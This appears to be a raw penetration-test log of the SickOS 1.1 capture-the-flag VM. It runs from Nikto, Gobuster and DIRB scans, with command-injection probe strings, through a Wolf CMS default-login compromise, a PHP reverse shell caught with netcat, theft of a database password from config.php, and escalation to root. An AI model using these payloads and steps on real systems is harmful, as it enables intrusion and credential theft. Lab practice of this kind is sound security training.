+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-2225: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
+ OSVDB-3092: /shopadmin.asp: VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.
+ OSVDB-473: /_vti_pvt/service.cnf: Contains meta-information about the web server Remove or ACL if FrontPage is not being used.
+ OSVDB-568: /blahb.ida: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. http://www.microsoft.com/technet/security/bulletin/MS01-033.asp.
+ OSVDB-578: /level/24/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/38/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/63/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/71/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-13405: /WS_FTP.LOG: WS_FTP.LOG file was found. It may contain sensitive information.
+ OSVDB-3093: /cgi-915/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi-win/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcgi/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi-bin/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-1642: /cgi-win/gbook/gbook.cgi?_MAILTO=xx;ls: gbook.cgi allows command execution.
+ OSVDB-7161: /scripts/bslist.cgi?email=x;ls: BSList allows command execution.
+ OSVDB-7161: /cgi-perl/bslist.cgi?email=x;ls: BSList allows command execution.
+ OSVDB-7162: /webcgi/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi-915/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi-bin-sdb/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-136: /cgi/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-win/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /fcgi-bin/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-perl/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-bin-sdb/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-228: /cgi/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-bin/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-win/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /fcgi-bin/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-exe/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-perl/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access to allowed sources.
+ OSVDB-127: /cgi/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-127: /cgis/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-127: /scripts/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-128: /cgibin/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-128: /cgi-win/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-128: /cgi-bin-sdb/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-2: /iissamples/exair/search/search.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-2717: /cgi-bin/include/new-visitor.inc.php: Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.
+ OSVDB-2717: /cgi-perl/include/new-visitor.inc.php: Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.
+ OSVDB-2735: /cgi-bin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /cgibin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /scripts/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /fcgi-bin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-275: /scripts/tools/newdsn.exe: This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. http://www.securityfocus.com/bid/1818. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)
+ OSVDB-279: /cgi-915/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgis/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /scripts/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-exe/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-perl/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /scripts/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /fcgi-bin/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-exe/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated:  2 error(s) and 589 item(s) reported on remote host
+ End Time:           2017-01-11 21:10:07 (GMT2) (246 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

SingleScan is testing URL: 'http://192.168.1.9:80/'
[19:18:55] [OUT] Inspecting URL 'http://192.168.1.9:80/'...

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.9:80/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wfuzz/wordlist/general/big.txt
[+] Status codes : 302,307,403,500,200,204,301
[+] Proxy        : http://192.168.1.9:3128/
[+] Expanded     : true
=====================================================
http://192.168.1.9:80/cgi-bin/ (Status: 403)
http://192.168.1.9:80/connect (Status: 200)
http://192.168.1.9:80/index (Status: 200)
=====================================================

-----------------
DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Wed Jan 11 21:18:58 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
PROXY: 192.168.1.9:3128

-----------------

GENERATED WORDS: 20458                                                      

---- Scanning URL: http://192.168.1.9:80/ ----
+ http://192.168.1.9:80/cgi-bin/ (CODE:403|SIZE:287)                                                                                                                                                            
+ http://192.168.1.9:80/connect (CODE:200|SIZE:109)                                                                                                                                                            
+ http://192.168.1.9:80/index (CODE:200|SIZE:21)                                                                                                                                                                
+ http://192.168.1.9:80/robots (CODE:200|SIZE:45)                                                                                                                                                              
+ http://192.168.1.9:80/robots.txt (CODE:200|SIZE:45)                                                                                                                                                          
+ http://192.168.1.9:80/server-status (CODE:403|SIZE:292)                                                                                                                                                      
                                                                                                                                                                                                               
-----------------
END_TIME: Wed Jan 11 21:19:13 2017
DOWNLOADED: 20458 - FOUND: 6
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.1.9:80
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request  
==================================================================


Fatal exception: FUZZ words and number of payloads do not match!

+ http://192.168.1.9:80/cgi-bin/

status
{ "uptime": " 02:28:29 up 2:37, 0 users, load average: 0.00, 0.01, 0.03", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}

+ http://192.168.1.9:80/server-status
Forbidden

You don't have permission to access /cgi-bin/ on this server.
Apache/2.2.22 (Ubuntu) Server at 192.168.1.9 Port 80

+ http://192.168.1.9:80/connect
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"

http://192.168.1.9/index
<h1>
BLEHHH!!!
</h1>

http://192.168.1.9:80/robots
http://192.168.1.9/robots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms

http://192.168.1.9/wolfcms/

http://192.168.1.9/wolfcms/?/admin/login
admin:admin
Wolf CMS 0.8.2

Upload reverse shell
http://192.168.1.9/wolfcms/public/php-reverse-shell.php

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 45100
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 03:18:00 up  3:27,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@SickOs:/$


www-data@SickOs:/etc/apache2/sites-available$ cat default
cat default
<VirtualHost *:80>
ServerAdmin webmaster@localhost

DocumentRoot /var/www
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>
www-data@SickOs:/etc/apache2/sites-available$ cd /var/www
cd /var/www
www-data@SickOs:/var/www$ ls
ls
connect.py
index.php
robots.txt
wolfcms
www-data@SickOs:/var/www$ cd wolfcms
cd wolfcms
www-data@SickOs:/var/www/wolfcms$ ls
ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf
www-data@SickOs:/var/www/wolfcms$ cat config.php
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');


www-data@SickOs:/var/www/wolfcms$ su sickos
su sickos
su: must be run from a terminal
www-data@SickOs:/var/www/wolfcms$ python -c 'import pty; pty.spawn("/bin/sh")'
<lfcms$ python -c 'import pty; pty.spawn("/bin/sh")'                      
$ su sickos
su sickos
Password: john@123
sickos@SickOs:/var/www/wolfcms$ cd ~
sickos@SickOs:~$ cat .bash_history
cat .bash_history
sudo su
exit

sickos@SickOs:~$ sudo su
sudo su
[sudo] password for sickos: john@123

root@SickOs:/home/sickos# cd /root
cd /root
root@SickOs:~# ls -la
ls -la
total 40
drwx------  3 root root 4096 Dec  6  2015 .
drwxr-xr-x 22 root root 4096 Sep 22  2015 ..
-rw-r--r--  1 root root   96 Dec  6  2015 a0216ea4d51874464078c618298b1367.txt
-rw-------  1 root root 3724 Dec  6  2015 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Sep 22  2015 .cache
-rw-------  1 root root   22 Dec  5  2015 .mysql_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-------  1 root root 5230 Dec  6  2015 .viminfo
root@SickOs:~# cat *.txt
cat *.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


Regards,
Yuriy Stanchev/URIX